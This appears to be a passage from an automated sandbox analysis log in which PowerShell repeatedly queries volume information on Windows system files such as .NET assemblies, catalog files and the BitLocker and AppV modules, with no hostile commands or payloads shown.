Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
